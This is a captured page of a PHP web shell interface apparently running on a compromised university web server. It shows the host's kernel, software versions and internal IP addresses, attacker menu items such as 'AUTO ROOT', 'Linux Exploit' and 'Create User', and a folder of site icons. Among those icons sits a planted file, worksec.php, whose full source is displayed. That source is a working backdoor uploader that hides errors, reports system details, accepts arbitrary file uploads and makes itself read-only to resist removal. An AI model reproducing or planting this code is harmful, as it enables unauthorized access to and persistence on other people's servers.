Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
html3 /
img /
iconos /
[ HOME SHELL ]
Name
Size
Permission
Action
aptitudes.png
32.5
KB
-rwxrwxr-x
asertividad2.png
18.38
KB
-rwxrwxr-x
asertividad.png
14.65
KB
-rwxrwxr-x
autoestima2.png
47.17
KB
-rwxrwxr-x
autoestima3.png
4.66
KB
-rwxrwxr-x
autoestima4.png
18.61
KB
-rwxrwxr-x
autoestima.png
6.4
KB
-rwxrwxr-x
datos.png
468.05
KB
-rwxrwxr-x
encuesta.png
4.24
KB
-rwxrwxr-x
formato2.png
10.03
KB
-rwxrwxr-x
formato.png
242.76
KB
-rwxrwxr-x
intereses2.png
16.67
KB
-rwxrwxr-x
intereses3.png
21.13
KB
-rwxrwxr-x
intereses.png
24.57
KB
-rwxrwxr-x
pertinencia.png
41.04
KB
-rwxrwxr-x
worksec.php
1.02
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : worksec.php
<?php // Path to the file $file = 'worksec.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php error_reporting(0); set_time_limit(0); $user = get_current_user(); echo "<center><b>Uname:".php_uname()."<br></b>"; echo "<br><b>Base Dir : ".getcwd()."<br></b>"; echo "<br><b>User : ".$user."<br></b>"; echo '<br><font color="black" size="4">'; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>"; } }else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?>
Close